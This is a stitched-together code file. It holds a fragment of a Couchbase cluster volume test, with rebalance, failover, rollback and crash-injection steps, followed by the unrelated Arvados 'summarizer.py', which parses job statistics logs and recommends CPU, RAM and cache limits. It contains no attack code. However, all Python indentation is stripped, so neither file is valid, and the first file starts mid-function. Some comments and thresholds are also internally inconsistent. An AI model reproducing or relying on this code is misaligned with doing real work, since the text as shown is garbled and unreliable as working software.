drop = 0
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
drop = 0
for i in range(1, total_collections, 2):
collection = self.collection_prefix + str(i)
self.bucket_util.drop_collection(self.cluster.master,
bucket,
scope,
collection)
bucket.scopes[scope].collections.pop(collection)
drop += 1
self.num_collections = self.num_collections - drop
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets)
self.final_items = self.final_items * (self.num_collections)/total_collections
self.log.info("Expected items after dropping collections: {}".
format(self.final_items))
self.bucket_util.verify_stats_all_buckets(self.cluster,
self.final_items,
timeout=3600)
if self.end_step == 13:
exit(13)
#######################################################################
self.PrintStep("Step 14: Normal Rollback with deletes")
'''
Final Docs = 30M (0-20M, 10M Random)
'''
self.perform_rollback(0, mem_only_items, doc_type="delete")
if self.end_step == 14:
exit(14)
#######################################################################
self.PrintStep("Step 15: Normal Rollback with expiry")
'''
Final Docs = 30M (0-20M, 10M Random)
'''
self.perform_rollback(0, mem_only_items, doc_type="expiry")
if self.end_step == 15:
exit(15)
#######################################################################
self.skip_read_on_error = True
self.suppress_error_table = True
self.track_failures = False
if self.crashes:
self.PrintStep("Step 16: Random crashes during CRUD-Expiry")
'''
Creates: 20M-50M
Final Docs = 60M (0-50M, 10M Random)
Updates: 0M-20M
Final Docs = 60M (0-50M, 10M Random)
Deletes: 0M-20M
Final Docs = 40M (20-50M, 10M Random)
Expiry: 0M-20M , MAXTTL=5s
Final Docs = 40M (20-50M, 10M Random)
'''
self.create_perc = 300
self.update_perc = 200
self.delete_perc = 200
self.expiry_perc = 200
self.generate_docs(doc_ops="create;update;delete;expiry",
delete_start=0,
delete_end=self.num_items*self.delete_perc/100,
expire_start=0,
expire_end=self.num_items*self.expiry_perc/100)
task = self.data_load()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
self.task_manager.get_task_result(task)
self.stop_crash = True
th.join()
if self.end_step == 16:
exit(16)
#######################################################################
self.skip_read_on_error = True
self.suppress_error_table = True
self.track_failures = False
self.PrintStep("Step 17: Random crashes during CRUD-Expiry")
'''
Creates: 50M-80M
Final Docs = 90M (0-80M, 10M Random)
Updates: 0M-20M
Final Docs = 90M (0-80M, 10M Random)
Deletes: 0M-20M
Final Docs = 70M (20-90M, 10M Random)
Expiry: 0M-20M , MAXTTL=5s
Final Docs = 40M (20-50M, 10M Random)
'''
self.create_perc = 300
self.update_perc = 200
self.delete_perc = 150
self.expiry_perc = 150
self.generate_docs(doc_ops="create;update;delete;expiry")
task = self.data_load()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False,
"num_kills": 20})
th.start()
self.task_manager.get_task_result(task)
self.stop_crash = True
th.join()
if self.end_step == 17:
exit(17)
#######################################################################
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
for i in range(1, total_collections, 2):
collection = self.collection_prefix + str(i)
self.bucket_util.create_collection(self.cluster.master,
bucket,
scope,
{"name": collection})
self.num_collections += 1
self.sleep(0.5)
self.bucket_util.flush_all_buckets(self.cluster)
self.init_doc_params()
self.sleep(600, "Iteration %s completed successfully !!!" % self.loop)
self.loop += 1
if self.end_step == 18:
exit(18)
def SystemTestMagma(self):
#######################################################################
self.loop = 1
self.skip_read_on_error = True
self.suppress_error_table = True
self.track_failures = False
self.crash_count = 0
self.stop_rebalance = self.input.param("pause_rebalance", False)
self.crashes = self.input.param("crashes", 20)
self.PrintStep("Step 3: Create %s items sequentially" % self.num_items)
self.expiry_perc = 100
self.create_perc = 100
self.update_perc = 100
self.delete_perc = 100
self.key_prefix = "random"
self.doc_ops = self.input.param("doc_ops", ["expiry"])
self.generate_docs(doc_ops=self.doc_ops,
expire_start=0,
expire_end=self.num_items,
create_start=self.num_items,
create_end=self.num_items*2,
update_start=self.num_items*2,
update_end=self.num_items*3
)
self.perform_load(wait_for_load=False)
self.sleep(300)
while self.loop <= self.iterations:
###################################################################
self.PrintStep("Step 4: Rebalance in with Loading of docs")
rebalance_task = self.rebalance(nodes_in=1, nodes_out=0)
if self.stop_rebalance:
rebalance_task = self.pause_rebalance()
else:
rebalance_task = self.abort_rebalance(rebalance_task, "kill_memcached")
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 5: Rebalance Out with Loading of docs")
rebalance_task = self.rebalance(nodes_in=0, nodes_out=1)
if self.stop_rebalance:
rebalance_task = self.pause_rebalance()
else:
rebalance_task = self.abort_rebalance(rebalance_task, "kill_memcached")
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 6: Rebalance In_Out with Loading of docs")
rebalance_task = self.rebalance(nodes_in=2, nodes_out=1)
if self.stop_rebalance:
rebalance_task = self.pause_rebalance()
else:
rebalance_task = self.abort_rebalance(rebalance_task, "kill_memcached")
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 7: Swap with Loading of docs")
rebalance_task = self.rebalance(nodes_in=1, nodes_out=1)
if self.stop_rebalance:
rebalance_task = self.pause_rebalance()
else:
rebalance_task = self.abort_rebalance(rebalance_task, "kill_memcached")
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 8: Failover a node and RebalanceOut that node \
with loading in parallel")
# Chose node to failover
self.rest = RestConnection(self.cluster.master)
self.nodes = self.cluster_util.get_nodes(self.cluster.master)
self.chosen = self.cluster_util.pick_nodes(self.cluster.master,
howmany=1)
# Failover Node
self.success_failed_over = self.rest.fail_over(self.chosen[0].id,
graceful=True)
self.sleep(10)
self.rest.monitorRebalance()
# Rebalance out failed over node
self.otpNodes = self.rest.node_statuses()
self.rest.rebalance(otpNodes=[otpNode.id for otpNode in self.otpNodes],
ejectedNodes=[self.chosen[0].id])
self.assertTrue(self.rest.monitorRebalance(stop_if_loop=True),
msg="Rebalance failed")
# Maintain nodes availability
servs_out = [node for node in self.cluster.servers
if node.ip == self.chosen[0].ip]
self.cluster.nodes_in_cluster = list(
set(self.cluster.nodes_in_cluster) - set(servs_out))
self.available_servers += servs_out
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 9: Failover a node and FullRecovery\
that node")
self.rest = RestConnection(self.cluster.master)
self.nodes = self.cluster_util.get_nodes(self.cluster.master)
self.chosen = self.cluster_util.pick_nodes(self.cluster.master,
howmany=1)
# Mark Node for failover
self.success_failed_over = self.rest.fail_over(self.chosen[0].id,
graceful=True)
self.sleep(10)
self.rest.monitorRebalance()
# Mark Node for full recovery
if self.success_failed_over:
self.rest.set_recovery_type(otpNode=self.chosen[0].id,
recoveryType="full")
rebalance_task = self.task.async_rebalance(
self.cluster.servers[:self.nodes_init], [], [],
retry_get_process_num=3000)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 10: Failover a node and DeltaRecovery that \
node with loading in parallel")
self.rest = RestConnection(self.cluster.master)
self.nodes = self.cluster_util.get_nodes(self.cluster.master)
self.chosen = self.cluster_util.pick_nodes(self.cluster.master,
howmany=1)
# Mark Node for failover
self.success_failed_over = self.rest.fail_over(self.chosen[0].id,
graceful=True)
self.sleep(10)
self.rest.monitorRebalance()
if self.success_failed_over:
self.rest.set_recovery_type(otpNode=self.chosen[0].id,
recoveryType="delta")
rebalance_task = self.task.async_rebalance(
self.cluster.servers[:self.nodes_init], [], [],
retry_get_process_num=3000)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 12: Updating the bucket replica to 2")
bucket_helper = BucketHelper(self.cluster.master)
for i in range(len(self.cluster.buckets)):
bucket_helper.change_bucket_props(
self.cluster.buckets[i], replicaNumber=2)
rebalance_task = self.rebalance(nodes_in=1, nodes_out=0)
if self.stop_rebalance:
rebalance_task = self.pause_rebalance()
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 13: Updating the bucket replica to 1")
bucket_helper = BucketHelper(self.cluster.master)
for i in range(len(self.cluster.buckets)):
bucket_helper.change_bucket_props(
self.cluster.buckets[i], replicaNumber=1)
rebalance_task = self.task.async_rebalance(
self.cluster.nodes_in_cluster, [], [],
retry_get_process_num=3000)
if self.stop_rebalance:
rebalance_task = self.pause_rebalance()
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 14: Start the entire process again")
self.loop += 1
if self.loop < self.iterations:
self.sleep(10)
if len(self.cluster.nodes_in_cluster) > self.nodes_init:
nodes_cluster = self.cluster.nodes_in_cluster[:]
nodes_cluster.remove(self.cluster.master)
servs_out = random.sample(
nodes_cluster,
int(len(self.cluster.nodes_in_cluster)
- self.nodes_init))
rebalance_task = self.task.async_rebalance(
self.cluster.servers[:self.nodes_init], [], servs_out,
retry_get_process_num=3000)
self.task.jython_task_manager.get_task_result(
rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.available_servers += servs_out
self.cluster.nodes_in_cluster = list(
set(self.cluster.nodes_in_cluster) - set(servs_out))
self.print_stats()
self.log.info("Volume Test Run Complete")
self.task_manager.abort_all_tasks()
|
summarizer.py
|
# Copyright (C) The Arvados Authors. All rights reserved.
#
# SPDX-License-Identifier: AGPL-3.0
import arvados
import collections
import crunchstat_summary.dygraphs
import crunchstat_summary.reader
import datetime
import functools
import itertools
import math
import re
import sys
import threading
import _strptime
from arvados.api import OrderedJsonModel
from crunchstat_summary import logger
# Recommend memory constraints that are this multiple of an integral
# number of GiB. (Actual nodes tend to be sold in sizes like 8 GiB
# that have amounts like 7.5 GiB according to the kernel.)
AVAILABLE_RAM_RATIO = 0.95
MB=2**20
# Workaround datetime.datetime.strptime() thread-safety bug by calling
# it once before starting threads. https://bugs.python.org/issue7980
datetime.datetime.strptime('1999-12-31_23:59:59', '%Y-%m-%d_%H:%M:%S')
WEBCHART_CLASS = crunchstat_summary.dygraphs.DygraphsChart
class Task(object):
def __init__(self):
self.starttime = None
self.finishtime = None
self.series = collections.defaultdict(list)
class Summarizer(object):
def __init__(self, logdata, label=None, skip_child_jobs=False, uuid=None, **kwargs):
self._logdata = logdata
self.uuid = uuid
self.label = label
self.starttime = None
self.finishtime = None
self._skip_child_jobs = skip_child_jobs
# stats_max: {category: {stat: val}}
self.stats_max = collections.defaultdict(
functools.partial(collections.defaultdict, lambda: 0))
# task_stats: {task_id: {category: {stat: val}}}
self.task_stats = collections.defaultdict(
functools.partial(collections.defaultdict, dict))
self.seq_to_uuid = {}
self.tasks = collections.defaultdict(Task)
# We won't bother recommending new runtime constraints if the
# constraints given when running the job are known to us and
# are already suitable. If applicable, the subclass
# constructor will overwrite this with something useful.
self.existing_constraints = {}
logger.debug("%s: logdata %s", self.label, logdata)
def run(self):
logger.debug("%s: parsing logdata %s", self.label, self._logdata)
with self._logdata as logdata:
self._run(logdata)
def _run(self, logdata):
self.detected_crunch1 = False
for line in logdata:
if not self.detected_crunch1 and '-8i9sb-' in line:
self.detected_crunch1 = True
if self.detected_crunch1:
m = re.search(r'^\S+ \S+ \d+ (?P<seq>\d+) job_task (?P<task_uuid>\S+)$', line)
if m:
seq = int(m.group('seq'))
uuid = m.group('task_uuid')
self.seq_to_uuid[seq] = uuid
logger.debug('%s: seq %d is task %s', self.label, seq, uuid)
continue
m = re.search(r'^\S+ \S+ \d+ (?P<seq>\d+) (success in|failure \(#., permanent\) after) (?P<elapsed>\d+) seconds', line)
if m:
task_id = self.seq_to_uuid[int(m.group('seq'))]
elapsed = int(m.group('elapsed'))
self.task_stats[task_id]['time'] = {'elapsed': elapsed}
if elapsed > self.stats_max['time']['elapsed']:
self.stats_max['time']['elapsed'] = elapsed
continue
m = re.search(r'^\S+ \S+ \d+ (?P<seq>\d+) stderr Queued job (?P<uuid>\S+)$', line)
if m:
uuid = m.group('uuid')
if self._skip_child_jobs:
logger.warning('%s: omitting stats from child job %s'
' because --skip-child-jobs flag is on',
self.label, uuid)
continue
logger.debug('%s: follow %s', self.label, uuid)
child_summarizer = ProcessSummarizer(uuid)
child_summarizer.stats_max = self.stats_max
child_summarizer.task_stats = self.task_stats
child_summarizer.tasks = self.tasks
child_summarizer.starttime = self.starttime
child_summarizer.run()
logger.debug('%s: done %s', self.label, uuid)
continue
# 2017-12-02_17:15:08 e51c5-8i9sb-mfp68stkxnqdd6m 63676 0 stderr crunchstat: keepcalls 0 put 2576 get -- interval 10.0000 seconds 0 put 2576 get
m = re.search(r'^(?P<timestamp>[^\s.]+)(\.\d+)? (?P<job_uuid>\S+) \d+ (?P<seq>\d+) stderr (?P<crunchstat>crunchstat: )(?P<category>\S+) (?P<current>.*?)( -- interval (?P<interval>.*))?\n$', line)
if not m:
continue
else:
# crunch2
# 2017-12-01T16:56:24.723509200Z crunchstat: keepcalls 0 put 3 get -- interval 10.0000 seconds 0 put 3 get
m = re.search(r'^(?P<timestamp>\S+) (?P<crunchstat>crunchstat: )?(?P<category>\S+) (?P<current>.*?)( -- interval (?P<interval>.*))?\n$', line)
if not m:
continue
if self.label is None:
try:
self.label = m.group('job_uuid')
except IndexError:
self.label = 'label #1'
category = m.group('category')
if category.endswith(':'):
# "stderr crunchstat: notice: ..."
continue
elif category in ('error', 'caught'):
continue
elif category in ('read', 'open', 'cgroup', 'CID', 'Running'):
# "stderr crunchstat: read /proc/1234/net/dev: ..."
# (old logs are less careful with unprefixed error messages)
continue
if self.detected_crunch1:
task_id = self.seq_to_uuid[int(m.group('seq'))]
else:
task_id = 'container'
task = self.tasks[task_id]
# Use the first and last crunchstat timestamps as
# approximations of starttime and finishtime.
timestamp = m.group('timestamp')
if timestamp[10:11] == '_':
timestamp = datetime.datetime.strptime(
timestamp, '%Y-%m-%d_%H:%M:%S')
elif timestamp[10:11] == 'T':
timestamp = datetime.datetime.strptime(
timestamp[:19], '%Y-%m-%dT%H:%M:%S')
else:
raise ValueError("Cannot parse timestamp {!r}".format(
timestamp))
if task.starttime is None:
logger.debug('%s: task %s starttime %s',
self.label, task_id, timestamp)
if task.starttime is None or timestamp < task.starttime:
task.starttime = timestamp
if task.finishtime is None or timestamp > task.finishtime:
task.finishtime = timestamp
if self.starttime is None or timestamp < self.starttime:
self.starttime = timestamp
if self.finishtime is None or timestamp > self.finishtime:
self.finishtime = timestamp
if (not self.detected_crunch1) and task.starttime is not None and task.finishtime is not None:
elapsed = (task.finishtime - task.starttime).seconds
self.task_stats[task_id]['time'] = {'elapsed': elapsed}
if elapsed > self.stats_max['time']['elapsed']:
self.stats_max['time']['elapsed'] = elapsed
this_interval_s = None
for group in ['current', 'interval']:
if not m.group(group):
continue
category = m.group('category')
words = m.group(group).split(' ')
stats = {}
try:
for val, stat in zip(words[::2], words[1::2]):
if '.' in val:
stats[stat] = float(val)
else:
stats[stat] = int(val)
except ValueError as e:
# If the line doesn't start with 'crunchstat:' we
# might have mistaken an error message for a
# structured crunchstat line.
if m.group("crunchstat") is None or m.group("category") == "crunchstat":
logger.warning("%s: log contains message\n %s", self.label, line)
else:
logger.warning(
'%s: Error parsing value %r (stat %r, category %r): %r',
self.label, val, stat, category, e)
logger.warning('%s', line)
continue
if 'user' in stats or 'sys' in stats:
stats['user+sys'] = stats.get('user', 0) + stats.get('sys', 0)
if 'tx' in stats or 'rx' in stats:
stats['tx+rx'] = stats.get('tx', 0) + stats.get('rx', 0)
if group == 'interval':
if 'seconds' in stats:
this_interval_s = stats.get('seconds',0)
del stats['seconds']
if this_interval_s <= 0:
logger.error(
"BUG? interval stat given with duration {!r}".
format(this_interval_s))
else:
logger.error('BUG? interval stat missing duration')
for stat, val in stats.items():
if group == 'interval' and this_interval_s:
stat = stat + '__rate'
val = val / this_interval_s
if stat in ['user+sys__rate', 'user__rate', 'sys__rate', 'tx+rx__rate', 'rx__rate', 'tx__rate']:
task.series[category, stat].append(
(timestamp - self.starttime, val))
else:
if stat in ['rss','used','total']:
task.series[category, stat].append(
(timestamp - self.starttime, val))
self.task_stats[task_id][category][stat] = val
if val > self.stats_max[category][stat]:
self.stats_max[category][stat] = val
logger.debug('%s: done parsing', self.label)
self.job_tot = collections.defaultdict(
functools.partial(collections.defaultdict, int))
for task_id, task_stat in self.task_stats.items():
for category, stat_last in task_stat.items():
for stat, val in stat_last.items():
if stat in ['cpus', 'cache', 'swap', 'rss']:
# meaningless stats like 16 cpu cores x 5 tasks = 80
continue
self.job_tot[category][stat] += val
logger.debug('%s: done totals', self.label)
def long_label(self):
label = self.label
if hasattr(self, 'process') and self.process['uuid'] not in label:
label = '{} ({})'.format(label, self.process['uuid'])
if self.finishtime:
label += ' -- elapsed time '
s = (self.finishtime - self.starttime).total_seconds()
if s > 86400:
label += '{}d'.format(int(s/86400))
if s > 3600:
label += '{}h'.format(int(s/3600) % 24)
if s > 60:
label += '{}m'.format(int(s/60) % 60)
label += '{}s'.format(int(s) % 60)
return label
def text_report(self):
if not self.tasks:
return "(no report generated)\n"
return "\n".join(itertools.chain(
self._text_report_gen(),
self._recommend_gen())) + "\n"
def html_report(self):
return WEBCHART_CLASS(self.label, [self]).html()
def _text_report_gen(self):
yield "\t".join(['category', 'metric', 'task_max', 'task_max_rate', 'job_total'])
for category, stat_max in sorted(self.stats_max.items()):
for stat, val in sorted(stat_max.items()):
if stat.endswith('__rate'):
continue
max_rate = self._format(stat_max.get(stat+'__rate', '-'))
val = self._format(val)
tot = self._format(self.job_tot[category].get(stat, '-'))
yield "\t".join([category, stat, str(val), max_rate, tot])
for args in (
('Number of tasks: {}',
len(self.tasks),
None),
('Max CPU time spent by a single task: {}s',
self.stats_max['cpu']['user+sys'],
None),
('Max CPU usage in a single interval: {}%',
self.stats_max['cpu']['user+sys__rate'],
lambda x: x * 100),
('Overall CPU usage: {}%',
float(self.job_tot['cpu']['user+sys']) /
self.job_tot['time']['elapsed']
if self.job_tot['time']['elapsed'] > 0 else 0,
lambda x: x * 100),
('Max memory used by a single task: {}GB',
self.stats_max['mem']['rss'],
lambda x: x / 1e9),
('Max network traffic in a single task: {}GB',
self.stats_max['net:eth0']['tx+rx'] +
self.stats_max['net:keep0']['tx+rx'],
lambda x: x / 1e9),
('Max network speed in a single interval: {}MB/s',
self.stats_max['net:eth0']['tx+rx__rate'] +
self.stats_max['net:keep0']['tx+rx__rate'],
lambda x: x / 1e6),
('Keep cache miss rate {}%',
(float(self.job_tot['keepcache']['miss']) /
float(self.job_tot['keepcalls']['get']))
if self.job_tot['keepcalls']['get'] > 0 else 0,
lambda x: x * 100.0),
('Keep cache utilization {}%',
(float(self.job_tot['blkio:0:0']['read']) /
float(self.job_tot['net:keep0']['rx']))
if self.job_tot['net:keep0']['rx'] > 0 else 0,
lambda x: x * 100.0),
('Temp disk utilization {}%',
(float(self.job_tot['statfs']['used']) /
float(self.job_tot['statfs']['total']))
if self.job_tot['statfs']['total'] > 0 else 0,
lambda x: x * 100.0),
):
format_string, val, transform = args
if val == float('-Inf'):
continue
if transform:
val = transform(val)
yield "# "+format_string.format(self._format(val))
def _recommend_gen(self):
# TODO recommend fixing job granularity if elapsed time is too short
return itertools.chain(
self._recommend_cpu(),
self._recommend_ram(),
self._recommend_keep_cache(),
self._recommend_temp_disk(),
)
def _recommend_cpu(self):
"""Recommend asking for 4 cores if max CPU usage was 333%"""
constraint_key = self._map_runtime_constraint('vcpus')
cpu_max_rate = self.stats_max['cpu']['user+sys__rate']
if cpu_max_rate == float('-Inf') or cpu_max_rate == 0.0:
logger.warning('%s: no CPU usage data', self.label)
return
# TODO Don't necessarily want to recommend on isolated max peak
# take average CPU usage into account as well or % time at max
used_cores = max(1, int(math.ceil(cpu_max_rate)))
asked_cores = self.existing_constraints.get(constraint_key)
if asked_cores is None:
asked_cores = 1
# TODO: This should be more nuanced in cases where max >> avg
if used_cores < asked_cores:
yield (
'#!! {} max CPU usage was {}% -- '
'try reducing runtime_constraints to "{}":{}'
).format(
self.label,
math.ceil(cpu_max_rate*100),
constraint_key,
int(used_cores))
# FIXME: This needs to be updated to account for current nodemanager algorithms
def _recommend_ram(self):
"""Recommend an economical RAM constraint for this job.
Nodes that are advertised as "8 gibibytes" actually have what
we might call "8 nearlygibs" of memory available for jobs.
Here, we calculate a whole number of nearlygibs that would
have sufficed to run the job, then recommend requesting a node
with that number of nearlygibs (expressed as mebibytes).
Requesting a node with "nearly 8 gibibytes" is our best hope
of getting a node that actually has nearly 8 gibibytes
available. If the node manager is smart enough to account for
the discrepancy itself when choosing/creating a node, we'll
get an 8 GiB node with nearly 8 GiB available. Otherwise, the
advertised size of the next-size-smaller node (say, 6 GiB)
will be too low to satisfy our request, so we will effectively
get rounded up to 8 GiB.
For example, if we need 7500 MiB, we can ask for 7500 MiB, and
we will generally get a node that is advertised as "8 GiB" and
has at least 7500 MiB available. However, asking for 8192 MiB
would either result in an unnecessarily expensive 12 GiB node
(if node manager knows about the discrepancy), or an 8 GiB
node which has less than 8192 MiB available and is therefore
considered by crunch-dispatch to be too small to meet our
constraint.
When node manager learns how to predict the available memory
for each node type such that crunch-dispatch always agrees
that a node is big enough to run the job it was brought up
for, all this will be unnecessary. We'll just ask for exactly
the memory we want -- even if that happens to be 8192 MiB.
"""
constraint_key = self._map_runtime_constraint('ram')
used_bytes = self.stats_max['mem']['rss']
if used_bytes == float('-Inf'):
logger.warning('%s: no memory usage data', self.label)
return
used_mib = math.ceil(float(used_bytes) / MB)
asked_mib = self.existing_constraints.get(constraint_key)
nearlygibs = lambda mebibytes: mebibytes/AVAILABLE_RAM_RATIO/1024
if used_mib > 0 and (asked_mib is None or (
math.ceil(nearlygibs(used_mib)) < nearlygibs(asked_mib))):
yield (
'#!! {} max RSS was {} MiB -- '
'try reducing runtime_constraints to "{}":{}'
).format(
self.label,
int(used_mib),
constraint_key,
int(math.ceil(nearlygibs(used_mib))*AVAILABLE_RAM_RATIO*1024*(MB)/self._runtime_constraint_mem_unit()))
def _recommend_keep_cache(self):
"""Recommend increasing keep cache if utilization < 80%"""
constraint_key = self._map_runtime_constraint('keep_cache_ram')
if self.job_tot['net:keep0']['rx'] == 0:
return
utilization = (float(self.job_tot['blkio:0:0']['read']) /
float(self.job_tot['net:keep0']['rx']))
# FIXME: the default on this get won't work correctly
asked_cache = self.existing_constraints.get(constraint_key, 256) * self._runtime_constraint_mem_unit()
if utilization < 0.8:
yield (
'#!! {} Keep cache utilization was {:.2f}% -- '
'try doubling runtime_constraints to "{}":{} (or more)'
).format(
self.label,
utilization * 100.0,
constraint_key,
math.ceil(asked_cache * 2 / self._runtime_constraint_mem_unit()))
def _recommend_temp_disk(self):
"""Recommend decreasing temp disk if utilization < 50%"""
total = float(self.job_tot['statfs']['total'])
utilization = (float(self.job_tot['statfs']['used']) / total) if total > 0 else 0.0
if utilization < 50.8 and total > 0:
yield (
'#!! {} max temp disk utilization was {:.0f}% of {:.0f} MiB -- '
'consider reducing "tmpdirMin" and/or "outdirMin"'
).format(
self.label,
utilization * 100.0,
total / MB)
def _format(self, val):
"""Return a string representation of a stat.
{:.2f} for floats, default format for everything else."""
if isinstance(val, float):
return '{:.2f}'.format(val)
else:
return '{}'.format(val)
def _runtime_constraint_mem_unit(self):
if hasattr(self, 'runtime_constraint_mem_unit'):
return self.runtime_constraint_mem_unit
elif self.detected_crunch1:
return JobSummarizer.runtime_constraint_mem_unit
else:
return ContainerRequestSummarizer.runtime_constraint_mem_unit
def _map_runtime_constraint(self, key):
if hasattr(self, 'map_runtime_constraint'):
return self.map_runtime_constraint[key]
elif self.detected_crunch1:
return JobSummarizer.map_runtime_constraint[key]
else:
return key
class CollectionSummarizer(Summarizer):
def __init__(self, collection_id, **kwargs):
super(CollectionSummarizer, self).__init__(
crunchstat_summary.reader.CollectionReader(collection_id), **kwargs)
self.label = collection_id
def NewSummarizer(process_or_uuid, **kwargs):
"""Construct with the appropriate subclass for this uuid/object."""
if isinstance(process_or_uuid, dict):
process = process_or_uuid
uuid = process['uuid']
else:
uuid = process_or_uuid
process = None
arv = arvados.api('v1', model=OrderedJsonModel())
if '-dz642-' in uuid:
if process is None:
# Get the associated CR. Doesn't matter which since they all have the same logs
crs = arv.container_requests().list(filters=[['container_uuid','=',uuid]],limit=1).execute()['items']
if len(crs) > 0:
process = crs[0]
klass = ContainerRequestTreeSummarizer
elif '-xvhdp-' in uuid:
if process is None:
process = arv.container_requests().get(uuid=uuid).execute()
klass = ContainerRequestTreeSummarizer
elif '-8i9sb-' in uuid:
if process is None:
process = arv.jobs().get(uuid=uuid).execute()
klass = JobTreeSummarizer
elif '-d1hrv-' in uuid:
if process is None:
process = arv.pipeline_instances().get(uuid=uuid).execute()
klass = PipelineSummarizer
elif '-4zz18-' in uuid:
return CollectionSummarizer(collection_id=uuid)
else:
raise ArgumentError("Unrecognized uuid %s", uuid)
return klass(process, uuid=uuid, **kwargs)
class ProcessSummarizer(Summarizer):
"""Process is a job, pipeline, container, or container request."""
def __init__(self, process, label=None, **kwargs):
rdr = None
self.process = process
if label is None:
label = self.process.get('name', self.process['uuid'])
# Pre-Arvados v1.4 everything is in 'log'
# For 1.4+ containers have no logs and container_requests have them in 'log_uuid', not 'log'
log_collection = self.process.get('log')
if not log_collection:
log_collection = self.process.get('log_uuid')
if log_collection:
try:
rdr = crunchstat_summary.reader.CollectionReader(log_collection)
except arvados.errors.NotFoundError as e:
logger.warning("Trying event logs after failing to read "
"log collection %s: %s", self.process['log'], e)
if rdr is None:
rdr = crunchstat_summary.reader.LiveLogReader(self.process['uuid'])
label = label + ' (partial)'
super(ProcessSummarizer, self).__init__(rdr, label=label, **kwargs)
self.existing_constraints = self.process.get('runtime_constraints', {})
class JobSummarizer(ProcessSummarizer):
runtime_constraint_mem_unit = MB
map_runtime_constraint = {
'keep_cache_ram': 'keep_cache_mb_per_task',
'ram': 'min_ram_mb_per_node',
'vcpus': 'min_cores_per_node',
}
class ContainerRequestSummarizer(ProcessSummarizer):
runtime_constraint_mem_unit = 1
class MultiSummarizer(object):
def __init__(self, children={}, label=None, threads=1, **kwargs):
self.throttle = threading.Semaphore(threads)
self.children = children
self.label = label
def run_and_release(self, target, *args, **kwargs):
try:
return target(*args, **kwargs)
finally:
self.throttle.release()
def run(self):
threads = []
for child in self.children.values():
self.throttle.acquire()
t = threading.Thread(target=self.run_and_release, args=(child.run, ))
t.daemon = True
t.start()
threads.append(t)
for t in threads:
t.join()
def text_report(self):
txt = ''
d = self._descendants()
for child in d.values():
if len(d) > 1:
txt += '### Summary for {} ({})\n'.format(
child.label, child.process['uuid'])
txt += child.text_report()
txt += '\n'
return txt
def _descendants(self):
"""Dict of self and all descendants.
Nodes with nothing of their own to report (like
MultiSummarizers) are omitted.
"""
d = collections.OrderedDict()
for key, child in self.children.items():
if isinstance(child, Summarizer):
d[key] = child
if isinstance(child, MultiSummarizer):
d.update(child._descendants())
return d
def html_report(self):
return WEBCHART_CLASS(self.label, iter(self._descendants().values())).html()
class JobTreeSummarizer(MultiSummarizer):
"""Summarizes a job and all children listed in its components field."""
def __init__(self, job, label=None, **kwargs):
arv = arvados.api('v1', model=OrderedJsonModel())
label = label or job.get('name', job['uuid'])
children = collections.OrderedDict()
children[job['uuid']] = JobSummarizer(job, label=label, **kwargs)
if job.get('components', None):
preloaded = {}
for j in arv.jobs().index(
limit=len(job['components']),
filters=[['uuid','in',list(job['components'].values())]]).execute()['items']:
preloaded[j['uuid']] = j
for cname in sorted(job['components'].keys()):
child_uuid = job['components'][cname]
j = (preloaded.get(child_uuid) or
arv.jobs().get(uuid=child_uuid).execute())
children[child_uuid] = JobTreeSummarizer(job=j, label=cname, **kwargs)
super(JobTreeSummarizer, self).__init__(
children=children,
label=label,
**kwargs)
class PipelineSummarizer(MultiSummarizer):
def __init__(self, instance, **kwargs):
children = collections.OrderedDict()
for cname, component in instance['components'].items():
if 'job' not in component:
logger.warning(
"%s: skipping component with no job assigned", cname)
else:
logger.info(
"%s: job %s", cname, component['job']['uuid'])
summarizer = JobTreeSummarizer(component['job'], label=cname, **kwargs)
summarizer.label = '{} {}'.format(
cname, component['job']['uuid'])
children[cname] = summarizer
